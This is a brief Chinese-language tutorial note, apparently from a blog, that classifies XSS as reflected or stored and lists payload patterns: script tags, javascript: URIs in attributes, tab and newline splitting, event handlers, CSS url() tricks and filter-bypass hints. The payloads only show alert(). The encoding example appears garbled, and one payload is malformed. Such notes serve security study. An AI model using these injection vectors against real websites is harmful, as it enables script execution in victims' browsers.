-
xss的分類
-
反射性XSS(通常出現在搜索框,登入口處)
-
持久型(通常出現在評論,留言,博客日誌處)
-
xss的構造分類
-
利用<>標記注射 HTML/JAVASCRIPT
<script>alert('xss')</script>
</textarea><script>alert('xss')</script>
-
利用HTML標籤屬性值執行xss(通常HTML標記中的屬性都支持javascript:[code]僞協議的形式)注意:這裏並非所有瀏覽器都支持。還有並非所有的屬性值都能產生xss,可以使用下面的屬性值來測試
href=
lowsrc=
bgsound=
background=
value=
action=
dynsrc=
<table background="javascript:alert(/xss/)"></table>
<img src="javascript:alert('xss');"></img>
-
空格回車 TAB鍵
<img src=java script:alert(/xss/) width=100>
/*注意上面個不是空格是Tab符號*/
<img src=java
script:alert(/xss/) width=100>
<!--這裏是回車符號-->
-
對標籤屬性值轉碼 ASCII碼形式 因爲HTML屬性本身支持ASCII碼形式
<img src="javascript:alert('xss');">
<!--替換成-->
<img src="javascript:alert(/xss/);">
-
產生自己的事件(這裏的意思是如果存在反射型客戶端沒人點擊你構造的代碼,那你就可以自己產生事件來執行你的代碼) 比如click、mouseover、load等
<input type="button" value="click me" onclick="alert('click me')"/>
<img src="#" onerror=alert(/xss/)>
其他事件屬性
onResume
onReverse
onRowDelete
onRowInserted
OnSeek
onSeek
onSynchRestored
onTimeError
onTrackChange
onURLFlip
onRepeat
onMediaComplete
onMediaComplete
-
CSS樣式表 注意根據瀏覽器的不同CSS構造不一定通用
<div style="background-image:url(javascript:alert('XSS'))></div>
<style>
body {background-image:url("javascript:alert('xss')")}
</style>
-
繞過過濾規則 例如大小寫混合用 、不加雙引號、編碼十六、十、八、ASCII等
今天就先到這裏了,送上看到的一句話 東方吹破英雄夢,生活磨滅少年心 。